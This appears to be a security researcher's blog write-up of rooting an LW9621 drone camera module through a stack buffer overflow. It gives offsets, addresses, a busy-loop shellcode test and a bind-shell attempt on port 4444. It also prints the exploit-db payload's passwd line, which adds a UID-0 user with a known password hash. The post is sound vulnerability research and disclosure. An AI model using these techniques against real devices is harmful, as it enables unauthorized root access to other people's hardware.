Exploiting the LW9621 Drone Camera Module

Jul 4, 2020

Using a typical stack buffer overflow to gain root access to an LW9621 drone camera module used in common recreational drones.

TL;DR

I got root shell access to the LW9621 camera module by exploiting the command port of the lewei_cam process. A stack buffer overflow allowed overwriting the return address to jump to shellcode that added a new user with UID 0 and a known password to /etc/passwd, which I could use to log in through telnet.
This type of exploit isn’t as prevalent in modern systems with more advanced defenses, but this serves as an example of the many embedded and IoT devices that are still vulnerable.

Background

While reverse-engineering the control server of a new drone I got, I came across several locations where the number of bytes to read from the network into a fixed-size buffer was taken from user-controlled data. This allows an attacker to force the program to write data past the bounds of the buffer, which potentially allows remote code execution through a buffer-overflow exploit.

For a quick background on the device, the LW9621 is a wireless camera module used in common toy drones. It provides remote video streaming, recording, and control of the drone over WiFi, for which it acts as the access point. From the reverse-engineering work linked above, I pulled various files from /proc (initially assuming it to be Linux) to get more information about the operating system:

/proc/version

/proc/cpuinfo

/proc/meminfo

From the /proc files above, I could tell the module runs Linux 3.4.35 on an ARMv5 little-endian processor and has about 36 MB of RAM (about 7 MB free) for user-space processes. This let me know what kind of code I may need and that enough memory was available to run additional processes if needed.

On Linux, /proc/self is a symbolic link to the /proc/[PID] directory of the currently active process, so I can get information about the process to which I connect over port 7060. This is assuming that process is the one that calls open(2) and read(2); otherwise, I would get the information about a child process it forks to open and read the file. Downloading /proc/self/stat provided the following content:

/proc/self/stat

The fields are described in the /proc/[pid]/stat section of the proc(5) man page. Here, the process ID is 435 and the filename of the executable is lewei_cam. Knowing the PID, I could use /proc/435 to point to the same information instead of the /proc/self symlink. Downloading /proc/self/exe, which is a symbolic link to the executable path, provided the actual lewei_cam file from the file system. This is the file I previously downloaded and investigated in Ghidra.

First attempt

My first attempt at exploiting a stack buffer overflow did not quite work out because I couldn’t supply valid data to properly control the program’s execution flow. It was the first vulnerable area that I found, so I spent some time working on it before moving on to look for other vulnerabilities.

The function above executes in a thread to handle a client connecting to port 7060. I rewrote it from Ghidra’s decompilation and omitted some lines for clarity. This function contains two buffer overflow vulnerabilities: 1) at line 76 where network data is written to a stack buffer, and 2) at line 86 where network data is written to a heap buffer. Heap overflows are usually trickier to exploit, so I started with the stack buffer overflow.

At line 76, net_recv() is called to write size bytes into the stack_buf array. (The net_recv function wraps the recv(2) call in a loop because recv does not guarantee it will read all requested bytes in a single call.) The size variable is set at line 46, when 46 bytes from heap_buf, which were read from the socket at line 43, are written to the stack starting at the address pointed to by hdr.

Since size was set from data read off the network, it is controllable by a user. During normal operation, a proper client sets that value to 124, which is the size of the stack_buf array, but the value is never checked. If an attacker sends a header with the size field set to something larger than 124, and then sends that many bytes, the thread will attempt to write those bytes onto the stack from the socket, writing past the stack_buf array and into other variables.
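To make the mechanism concrete, here is a small Python model of the bug. It is not the device's code. The 124-byte buffer size comes from the text, and the 308-byte distance to context comes from the Ghidra offsets discussed in this section. The function names, the flat bytearray standing in for the stack frame, and the placeholder pointer value are all assumptions made for illustration.

```python
import struct

STACK_BUF_SIZE = 124   # size of stack_buf, per the text
CONTEXT_OFFSET = 308   # distance from stack_buf to context, per the text


def make_frame(context_ptr: int) -> bytearray:
    """Model the stack frame as flat bytes: stack_buf at 0, context at 308."""
    frame = bytearray(CONTEXT_OFFSET + 4)
    struct.pack_into("<I", frame, CONTEXT_OFFSET, context_ptr)
    return frame


def unchecked_recv(frame: bytearray, size: int, data: bytes) -> None:
    """Mirror the bug: size comes from the packet header and is never
    compared against STACK_BUF_SIZE before the bytes are written."""
    for i in range(min(size, len(data))):
        frame[i] = data[i]


def read_context(frame: bytearray) -> int:
    return struct.unpack_from("<I", frame, CONTEXT_OFFSET)[0]


frame = make_frame(0x12345678)             # hypothetical pointer value
unchecked_recv(frame, 124, b"A" * 124)     # well-behaved client
print(hex(read_context(frame)))            # pointer is intact
unchecked_recv(frame, 312, bytes(312))     # oversized request full of zeros
print(hex(read_context(frame)))            # pointer has been zeroed
```

In the model, a 124-byte request leaves the neighbouring pointer alone, while a 312-byte request of zeros clears it, which is the condition that leads to a null dereference in the real process.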

One way to verify the overflow is to induce a crash by writing zeros on the stack to trigger a segmentation fault when the process attempts to dereference a pointer. If I send a proper header with command #9 and enough follow-on bytes to overwrite the context pointer, the process should crash when it goes back to the top of the while loop and dereferences context inside the do/while loop. Using the stack offset values from Ghidra, stack_buf is 308 bytes away from context, so sending 312 bytes will overwrite it. I can skip the block starting at line 77 by setting size to be larger than the number of bytes actually sent.

Running this Python snippet crashed the process: port 7060 closed immediately after the throw. Several seconds later, it was listening again, so something must be restarting the process. I verified it was a new process by pulling /proc/self/stat again, which gave a new PID (585):

585 (lewei_cam) S 1 437 436 0 -1 4194560 390 0 0 0 8 13 0 0 20 0 6 0 119612 29175808 242 4294967295 32768 311536 3201117792 3201117240 3068265996 0 65536 65540 22018 4294967295 0 0 17 0 0 0 0 0 0 344304 345656 1257472
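A stat line like the one above can be split into named fields with a few lines of Python. This is only a sketch: the field positions follow the proc(5) man page, and the function name and the handful of fields it returns are my own choices.

```python
STAT_LINE = (
    "585 (lewei_cam) S 1 437 436 0 -1 4194560 390 0 0 0 8 13 0 0 20 0 6 0 "
    "119612 29175808 242 4294967295 32768 311536 3201117792 3201117240 "
    "3068265996 0 65536 65540 22018 4294967295 0 0 17 0 0 0 0 0 0 "
    "344304 345656 1257472"
)


def parse_stat(line: str) -> dict:
    """Extract a few fields from a /proc/[pid]/stat line."""
    # comm is wrapped in parentheses and may contain spaces or ')',
    # so split on the last ')' instead of on whitespace.
    left, right = line.rsplit(")", 1)
    pid_str, comm = left.split("(", 1)
    rest = right.split()          # rest[0] is field 3 (state)
    return {
        "pid": int(pid_str),
        "comm": comm,
        "state": rest[0],
        "ppid": int(rest[1]),
        "num_threads": int(rest[17]),   # field 20 in proc(5)
    }


info = parse_stat(STAT_LINE)
print(info["pid"], info["comm"], info["num_threads"])
```

Comparing the pid value between two downloads is enough to tell whether the process was restarted.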

After more poking around, I found that anyka_print(), which is used for debugging output in various locations, calls the syslog(3) function, so I downloaded /var/log/messages to see if it contained those logs. It did, and I verified the crash was a segfault (signal 11):

Jan  1 00:19:53 lewei user.debug syslog: [L:779]Client connected...IP:192.168.0.11, port:16106, fd:19.
Jan  1 00:19:53 lewei user.debug syslog: **************************
Jan  1 00:19:53 lewei user.debug syslog:  ##signal 11 caught
Jan  1 00:19:53 lewei user.debug syslog: **************************

The next step was to figure out a way to get arbitrary code execution. There are a few typical ways when using the stack. From the Buffer overflow page on Wikipedia:

A technically inclined user may exploit stack-based buffer overflows to manipulate the program to their advantage in one of several ways:
* By overwriting a local variable that is located near the vulnerable buffer on the stack, in order to change the behavior of the program
* By overwriting the return address in a stack frame. Once the function returns, execution will resume at the return address as specified by the attacker — usually a user-input filled buffer
* By overwriting a function pointer or exception handler, which is subsequently executed
* By overwriting a local variable (or pointer) of a different stack frame, which will be used by the function which owns that frame later.

My goal was to get a root shell on the camera, so merely changing the program behavior wasn’t enough, as this function and others in the call stack didn’t provide any exec capabilities that I could trick it into running. Some function pointers were used, such as when starting a streaming thread (which would occur in the omitted code at line 79), but those were hard-coded addresses I could not overwrite. The most likely method here was to overwrite the return address so that it pointed to some shellcode.

Before the function gets to any return address I set, it has to make it to the return at line 72, which includes successfully dereferencing context a few times and freeing some pointers. After searching around for a while, I wasn’t able to set context to a valid address where it could be dereferenced and freed (it had to be a valid heap address, and I couldn’t predict the value of the heap_buf pointer), so I decided to move on and look for similar vulnerabilities in other functions.

Second attempt (part 1)

My second attempt focused on a different function, lewei_cmd_execute(), that had a similar stack-buffer overflow vulnerability where I was able to control the flow enough to gain code execution. However, I had issues executing a shell connected to the socket. The following code shows the decompiled function with renamed variables and omitted code for clarity.

Just like the vulnerability in the first attempt, I could control the size variable, which was used to read more data from the socket onto the stack. The initial 48 bytes were read into buf by the calling function, which called this function, passing the socket, a pointer to the buffer, and the buffer length. That buffer is copied to the stack at line 23, probably into a struct data structure for ease of access to the internal fields (although the individual fields are just laid out in the decompiled code). Then after some checks and other setup, the function enters a switch block and jumps to the vulnerable code when the type is #4.

The command type #4 is used to set the system time from a 64-bit value that the user sends. Typically, size is 8, so the code would read the next 8 bytes into the time variable and call settime(), a custom function that sets the time by calling system("date \"YYYY-mm-dd HH:MM:SS\"").

Similar to the first attempt above, I wanted to prove I could overwrite the stack. Running the same Python snippet as above, but against port 8060, did crash the process, which I verified by pulling /var/log/messages. The next step was to see if I could actually control the execution flow. Once the buffer overflow occurs, I can skip the settime() block at line 35 by sending one less byte than size, which breaks out of the switch block, calls free(heap_buf), sets the return value in a register, and returns to the calling function. Unlike with client_thread(), I can get to the return by making sure I overwrite the heap_buf pointer with zeros, which free() accepts. I should be able to overwrite the return address and jump to an arbitrary instruction in the program.

In order to calculate how far the location of the return address was from the time variable, I needed to understand the prologue and epilogue for the ARM calling convention, which for this function, looked like:

; prologue
stmdb   sp!,{ r4, r11, lr }
add     r11,sp,#0x8
sub     sp,sp,#0x204
; function code
...
; epilogue
sub     sp,r11,#0x8
ldmia   sp!,{ r4, r11, pc }

In the prologue, lr (the link register (r14), which stores the return address), r11 (the frame pointer), and r4 (I’m not sure what it is used for) are pushed onto the stack in that order. The new frame pointer (r11) is set to point to where the saved lr is on the stack by adding 8 to the current stack pointer (sp), and 0x204 is subtracted from the stack pointer to mark the top of this function’s stack, making room for all the local variables. In the epilogue, the stack pointer is reset to the frame pointer minus 8, and the three registers are restored from the stack (the saved lr is restored into the program counter pc as the next instruction to execute, which is how the function “returns”).

Here’s what the layout of the stack should be after the prologue executes:

An example stack layout during the execution of lewei_cmd_execute() just after the function prologue, showing only the local variables used in the code snippet above. A few of the variables are not aligned at the four-byte boundary, so some shading shows the related half-words. (The addresses in the Address column were made up for this example.)

At line 34, the data for the buffer overflow is read from the socket and written to the stack, starting at the address of the time variable, which is r11-0xcc (or 0xb000ff24 in this example). To overwrite the saved lr value, 208 bytes are needed (0xb000fff0 - 0xb000ff24 = 204, plus 4 bytes to overwrite it).
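The frame arithmetic can be replayed in Python as a sanity check. This sketch walks the three prologue instructions on plain integers. The entry stack pointer 0xb000fff4 is simply the value that reproduces the made-up example addresses in this post, and the function and key names are my own.

```python
def frame_after_prologue(sp_on_entry: int) -> dict:
    """Replay the prologue on plain integers and report where things land."""
    sp = sp_on_entry - 3 * 4   # stmdb sp!,{r4, r11, lr}: r4 at sp, r11 at sp+4, lr at sp+8
    r11 = sp + 0x8             # add r11,sp,#0x8: r11 now points at the saved lr
    sp = sp - 0x204            # sub sp,sp,#0x204: room for the locals
    return {
        "saved_r4": r11 - 8,
        "saved_r11": r11 - 4,
        "saved_lr": r11,
        "sp": sp,
        "time": r11 - 0xCC,    # address of the time variable, per the text
    }


frame = frame_after_prologue(0xB000FFF4)
bytes_to_reach_lr = frame["saved_lr"] - frame["time"]
bytes_to_overwrite_lr = bytes_to_reach_lr + 4

print(hex(frame["time"]), hex(frame["saved_lr"]))
print(bytes_to_reach_lr, bytes_to_overwrite_lr)
```

The distance depends only on the 0xcc offset, so it stays at 204 bytes (208 including the saved lr) no matter where the thread's stack actually lives.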

To prove I could set the return address and jump anywhere, I thought about trying to jump to the anyka_print call at line 28. Calling that function makes references to the stack, so I couldn’t leave the saved r11 address as all zeros. I downloaded /proc/self/maps to get the valid address space for the program. There were several stacks in use because of the multiple running threads, so I just chose an arbitrary address in the middle of the main stack.

Example /proc/self/maps for lewei_cam (truncated some lines for space).

The main stack range was 0xbed69000 to 0xbed8a000, so I chose 0xbed80000 to use for r11. The maps file also shows the program address space starts at 0x00008000, which is the same base address specified in the program’s header, so address space layout randomization is not in use here. Looking at the disassembly in Ghidra, the start of the call at line 28 is at 0x0001591c.

Disassembly for the anyka_print() call at line 28.

Running a small piece of Python with those addresses to test:

And downloading /var/log/messages again:

Jan  1 00:52:43 lewei user.debug syslog: [lewei_net do_accept_client]:Client connected...IP:192.168.0.11, port:56060, fd:20.
Jan  1 00:52:43 lewei user.debug syslog: TYPE 4, DATA LEN 209
Jan  1 00:52:43 lewei user.debug syslog: TYPE 0, DATA LEN 0
Jan  1 00:52:43 lewei user.debug syslog: **************************
Jan  1 00:52:43 lewei user.debug syslog:  ##signal 11 caught
Jan  1 00:52:43 lewei user.debug syslog: **************************

The process still crashed, but there’s an additional line that prints the type and data length again, which was due to the new return address. The printed values were 0 by chance; the memory location I set for the frame pointer must have been mostly zeros. This verifies I can properly set the return address.

Second attempt (part 2)

I could fully control the execution path of the program, but now I needed to figure out how to execute my own code. The classic, and probably easiest, way is to include shellcode in the data for the buffer overflow and set the return address to the stack location where that shellcode begins. Common defenses against that method include stack canaries and non-executable stacks. Luckily, neither was a problem here. The main stack in /proc/self/maps did not have the execute permission, but all the other stacks created by pthreads did allow execution. I knew the lewei_cmd_execute function was executing in a thread from tracing through Ghidra’s decompilation, so that would not be a blocker here.
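Checking which stacks are executable is easy to script against a downloaded maps file. The sketch below is only an illustration. The two sample lines are made up: the main stack range and the thread stack's high address are taken from this post, while the thread stack's low address and the thread ID in its label are invented. The function name is hypothetical too.

```python
# Illustrative sample only; see the note above about which values are invented.
SAMPLE_MAPS = """\
b4460000-b4560000 rwxp 00000000 00:00 0          [stack:600]
bed69000-bed8a000 rw-p 00000000 00:00 0          [stack]
"""


def list_stacks(maps_text: str) -> list:
    """Return (low, high, label, executable) for every stack mapping."""
    stacks = []
    for line in maps_text.splitlines():
        fields = line.split()
        # Format: address-range perms offset dev inode [pathname]
        if len(fields) < 6 or not fields[5].startswith("[stack"):
            continue
        low, high = (int(part, 16) for part in fields[0].split("-"))
        stacks.append((low, high, fields[5], "x" in fields[1]))
    return stacks


for low, high, label, executable in list_stacks(SAMPLE_MAPS):
    print(f"{low:08x}-{high:08x} {label:<12} executable={executable}")
```

Because the addresses change on every restart, a helper like this has to be rerun on a fresh download of the maps file after each crash.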

If I wanted to execute my shellcode from the stack, I needed to figure out which thread’s stack lewei_cmd_execute used. There were 14 stacks to check, which is low enough that I could manually try each one. The stack addresses change for each lewei_cam execution, but I can get the latest addresses from the process’s maps file. Here’s a list of stack ranges from one download:

The method I used to verify the stack was to write a lot of junk data in the buffer overflow, then jump to the same anyka_print call as above, which would print my junk data as the “TYPE” and “DATA LEN” values if I chose the correct stack address. I was curious how far down the stack this function was, so by setting the junk data to increasing 2-byte values, I could get the exact offset from the time variable. This took a bit of time because I had to download the new maps file each time the process crashed and adjust my guesses of how much junk data to send (too little and the print would not show my junk, too much and it would overwrite the next thread’s stack, possibly crashing the process before my jump).

Running the above Python code many times, changing the stack’s high address in fp after each crash, and changing other variables like the stack offset and how much junk to send, I finally got some useful output:

Jan  1 02:23:09 lewei user.debug syslog: [lewei_net do_accept_client]:Client connected...IP:192.168.0.11, port:16323, fd:20.
Jan  1 02:23:09 lewei user.debug syslog: TYPE 4, DATA LEN 8399
Jan  1 02:23:09 lewei user.debug syslog: TYPE 18809118, DATA LEN 19202340
Jan  1 02:23:09 lewei user.debug syslog: **************************
Jan  1 02:23:09 lewei user.debug syslog:  ##signal 11 caught
Jan  1 02:23:09 lewei user.debug syslog: **************************

Here, the “TYPE” was 18809118, and “DATA LEN” was 19202340, or 0x011f011e and 0x01250124 in hex, respectively. Because the system is little-endian, the bytes at the memory location where type starts were 1e 01 1f 01. This hit consistently on the 8th stack from the bottom of the maps file, and the printed junk data were always the same values. That means the type variable in this “shifted” call stack was 286 (0x011e) half-words away from the beginning of the “junk” data, which was the byte after the return address in the “original” call stack.
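The conversion from the logged decimal values back to junk-data indexes can be checked with the struct module. This is a small sketch, and the helper name is my own.

```python
import struct


def split_le_word(value: int):
    """Return the little-endian bytes of a 32-bit value and its two half-words."""
    raw = struct.pack("<I", value)
    low_half, high_half = struct.unpack("<2H", raw)
    return raw, low_half, high_half


for name, logged in (("TYPE", 18809118), ("DATA LEN", 19202340)):
    raw, low_half, high_half = split_le_word(logged)
    print(f"{name}: {logged:#010x} bytes={raw.hex(' ')} "
          f"half-words={low_half:#06x},{high_half:#06x}")
```

The first half-word of each value is the index of the incrementing 2-byte counter that landed on that variable, which is where the 0x011e figure comes from.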

Now that I had found the correct stack and knew how far down the stack the function was, I could calculate the exact offset of the time variable from the base of the thread’s stack. To help visualize the calculation, here is what the “shifted” call stack looked like (i.e., after it returned to the custom location and I overwrote the saved r11 to be 0xb4560000 - 0x1000 = 0xb455f000):

Forced call stack (by overwriting the saved r11 frame pointer) when forcing the return to the anyka_print() call, and their values, which were set by the incrementing 2-byte values from the buffer overflow.

The new frame pointer, which was 0x174 half-words from the beginning of the “junk” data, was 0x1000 bytes from the stack’s high address. Since the beginning of the “junk” data was 208 bytes from the time variable, that makes the beginning of the attack buffer 0x1000+(0x174*2)+208=0x13b8 bytes from the stack’s high address.
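The same sum written out in Python, as a check on the arithmetic. The constant names are my own, and the stack high address is the 0xb4560000 example value used earlier in this section.

```python
FP_BELOW_STACK_TOP = 0x1000   # forced frame pointer sat 0x1000 bytes below the stack's high address
FP_HALFWORD_INDEX = 0x174     # frame pointer position, counted in 2-byte junk values
JUNK_AFTER_TIME = 208         # junk data starts 208 bytes after the time variable

buffer_offset = FP_BELOW_STACK_TOP + FP_HALFWORD_INDEX * 2 + JUNK_AFTER_TIME
print(hex(buffer_offset))

stack_high = 0xB4560000       # example high address from this section
time_address = stack_high - buffer_offset
print(hex(time_address))
```

Only stack_high changes between runs. The offset itself stayed constant across restarts in my testing, since the printed junk values were always the same.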

The next step was to finally prove I could execute my own shellcode. One common trick is to use shellcode that implements an infinite busy loop. If the connection or process hangs, or the CPU’s load spikes, then the execution flow hit the infinite loop. For ARM, the instruction is 0xeafffffe, a branch whose target is its own address, so the CPU keeps executing the same instruction:

$ cat loop.s
.global _start
_start: b _start
$ arm-linux-gnu-as -o loop.o loop.s
$ arm-linux-gnu-ld -N -o loop loop.o
$ arm-linux-gnu-objcopy -O binary loop loop.bin
$ xxd -p loop.bin
feffffea
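Decoding those four bytes by hand shows why this single instruction loops forever. The sketch below follows the standard ARM (A32) B/BL encoding. The function name and the sample address 0x1000 are arbitrary choices for illustration.

```python
def decode_arm_branch(raw: bytes, address: int):
    """Decode a little-endian ARM B/BL instruction located at `address`."""
    word = int.from_bytes(raw, "little")
    if (word >> 25) & 0b111 != 0b101:
        raise ValueError("not a B/BL instruction")
    imm24 = word & 0xFFFFFF
    if imm24 & 0x800000:        # sign-extend the 24-bit word offset
        imm24 -= 1 << 24
    # In ARM state the PC reads as the instruction address plus 8.
    target = address + 8 + (imm24 << 2)
    return word, imm24, target


word, imm24, target = decode_arm_branch(bytes.fromhex("feffffea"), 0x1000)
print(hex(word), imm24, hex(target))
```

The offset field is -2 words, which exactly cancels the 8-byte pipeline offset of the program counter, so the branch target equals the instruction's own address wherever the instruction is placed.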

To execute my shellcode, the attack buffer should be 204 bytes of filler, the 4-byte return address, and then the shellcode itself. With this layout, the address of the shellcode will be the stack’s high address, minus 0x13b8 (to get to the beginning of the buffer), plus 208 (to point to just after the return address). I decided to start my shellcode after the return address for simplicity, but I could have put it somewhere in the first 204 bytes and calculated the address just as easily.
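Here is that address calculation as a small function, using the example high address 0xb4560000 from earlier in this section. The names are hypothetical and the function only does the arithmetic described above.

```python
BUFFER_BELOW_STACK_TOP = 0x13B8   # start of the buffer, measured from the stack's high address
RETURN_ADDRESS_OFFSET = 204       # bytes of filler before the saved return address
SHELLCODE_OFFSET = RETURN_ADDRESS_OFFSET + 4


def shellcode_address(stack_high: int) -> int:
    """Address just past the overwritten return address."""
    buffer_start = stack_high - BUFFER_BELOW_STACK_TOP
    return buffer_start + SHELLCODE_OFFSET


print(hex(shellcode_address(0xB4560000)))
```

The stack's high address has to be read from a fresh maps download before every attempt, because it changes each time the process restarts.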

Running some Python to test out my calculations:

Exploit to execute infinite busy loop shellcode.

Downloading the /proc/self/stat file shows the process has the same PID, so it didn’t crash. Pulling /proc/loadavg after a minute showed an increase in the first value, proving the shellcode executed. (The normal 1-minute load average was around 0.20.)

$ cat downloads/proc/loadavg
0.72 0.39 0.23 2/59 601
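For repeated checks, the loadavg line can be parsed and compared against the idle baseline. This is a minimal sketch: the field meanings follow proc(5), the 0.20 baseline is the figure mentioned above, and the function name is my own.

```python
def parse_loadavg(text: str) -> dict:
    """Split a /proc/loadavg line into its five fields."""
    one, five, fifteen, procs, last_pid = text.split()
    running, total = procs.split("/")
    return {
        "load_1min": float(one),
        "load_5min": float(five),
        "load_15min": float(fifteen),
        "running": int(running),
        "total": int(total),
        "last_pid": int(last_pid),
    }


BASELINE_1MIN = 0.20   # normal 1-minute load, per the text
sample = parse_loadavg("0.72 0.39 0.23 2/59 601")
print(sample["load_1min"], sample["load_1min"] > BASELINE_1MIN)
```

The 1-minute value is the one to watch, because the 5- and 15-minute averages lag well behind a newly started busy loop.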

Second attempt (part 3)

Now that I got remote code execution, the next step was to execute some shellcode that would provide some kind of shell access. I went over to exploit-db.com to search for some Linux/ARM shellcode I could use. The buffer wasn’t being treated as a C string, so I had more flexibility in the content of the shellcode and didn’t have to worry about NULL bytes. I also had a lot of memory space to use (over 4kB). I settled on shellcode that would bind on TCP port 4444 and execute /bin/sh once getting a connection, attaching stdin/stdout/stderr to the socket. Adding that shellcode using the same Python code above, and replacing the current stack’s high address:

Exploit script with shellcode to listen on TCP port 4444 and execute /bin/sh once it gets a connection.

After running that script, I tried to netcat to the port it should be listening on:

$ nc -v 192.168.0.1 4444
Connection to 192.168.0.1 4444 port [tcp/*] succeeded!

And it worked! However, after about a second, the connection dropped. I never got the /bin/sh prompt and couldn’t run a command before it dropped.

I tried various things like modifying the shellcode to fork then execute /bin/sh, not switching to Thumb mode, closing other file descriptors, trying execve(2) with an argv array, all with varying degrees of failure. The fork() seemed to hang. Closing other file descriptors caused the process to die and restart.

Downloading /var/log/messages again, I noticed some logging lines that weren’t from lewei_cam:

Sample from /var/log/messages after a failed /bin/sh execution.

The “MainApp was dead” and “call:” lines were from the /usr/bin/daemon program, which I found by grepping through the binaries I extracted from the full squashfs filesystem by downloading /dev/root. Looking through that binary in Ghidra, I found a function that watches /tmp/daemon_fifo, to which lewei_cam writes, and if it doesn’t receive an expected string through it every three seconds, it calls /usr/sbin/lewei_cam.sh to kill the process and start it again. I don’t think that restart was causing /bin/sh to fail, but I couldn’t prove that it wasn’t yet.

Third (and final) attempt

With the ability to run arbitrary shellcode of a decent size (over 4kB to work with), I just needed to figure out the right technique to finally gain shell access.

While searching through the Linux/ARM shellcode entries on exploit-db.com, I came across one that would add a new user: Add Root User (shell-storm/toor) To /etc/passwd Shellcode. I remembered that the camera had telnet open on port 23, but I had previously been unsuccessful at cracking root’s password hash from the /etc/shadow download. I wasn’t sure if /etc/passwd would be writable, but looking again at the extracted squashfs file system, I saw /etc/passwd and /etc/shadow were symlinks to /etc/jffs2/passwd and /etc/jffs2/shadow. Downloading the /proc/mounts file, which shows the mounted partitions, I saw that directory was writable:

$ grep "jffs2" ./downloads/proc/mounts
/dev/mtdblock2 /etc/jffs2 jffs2 rw,relatime 0 0

So I might be able to add a new user to /etc/passwd with a UID of 0 and a known password. The shellcode would append the following line:

shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash
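Splitting that entry into its seven colon-separated fields, as described in passwd(5), makes it easier to see what each part does. This is a small sketch and the function name is my own.

```python
ENTRY = "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash"


def parse_passwd_entry(line: str) -> dict:
    """Split one /etc/passwd line into its seven fields."""
    name, password, uid, gid, gecos, home, shell = line.rstrip("\n").split(":")
    return {
        "name": name,
        "password": password,   # a hash stored inline rather than in /etc/shadow
        "uid": int(uid),
        "gid": int(gid),
        "gecos": gecos,
        "home": home,
        "shell": shell,
    }


entry = parse_passwd_entry(ENTRY)
print(entry["name"], entry["uid"], entry["shell"])
```

The UID of 0 is what makes the account equivalent to root, the $1$ prefix marks an MD5-crypt hash, and the last field names the login shell, which has to exist on the target system.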

After replacing the TCP bind shellcode in the Python script above with the “shell-storm” one (I needed to add a NULL byte at the end because the shellcode isn’t being interpreted as a string) and getting the new stack address, I ran the script and tried to log in:

Exploit throw to add a root user. Login failed due to no /bin/bash.

Almost! Apparently the camera didn’t have /bin/bash to execute, so it immediately disconnected. I modified the shellcode so the user’s shell was just /bin/sh (I replaced the extra characters with newlines so the length would stay the same), and slightly modified the username to shell-storn so there wouldn’t be a conflict:

Script with the shellcode to successfully add a root user.

Throwing the exploit and trying to log in again:

Second exploit throw to add a root user, setting the user’s shell to /bin/sh, which worked.

Success! I finally had an unrestricted root shell on the camera. For easy access, I replaced root’s password hash with one of my own in /etc/shadow and removed the new shell-storm user.

I wasn’t sure what else I wanted to do with the camera at this point, but it was a fun ride.

Additional notes

I did email the company that makes the LW9621 camera module about the vulnerabilities I found, but never got a response.
I figure the risk of making this public is somewhat low because the camera module is just used in low-cost recreational drones. An attacker would need to successfully connect to the module’s WiFi access point, and the owner can enable WPA-PSK using pylwdrone.
After gaining root access, I spent some additional time trying to figure out why executing /bin/sh or forking wasn’t working in the shellcode, but I haven’t figured it out yet. I attempted to run a statically-compiled strace to attach to the process while exploiting it, but couldn’t find or build one that worked with this device.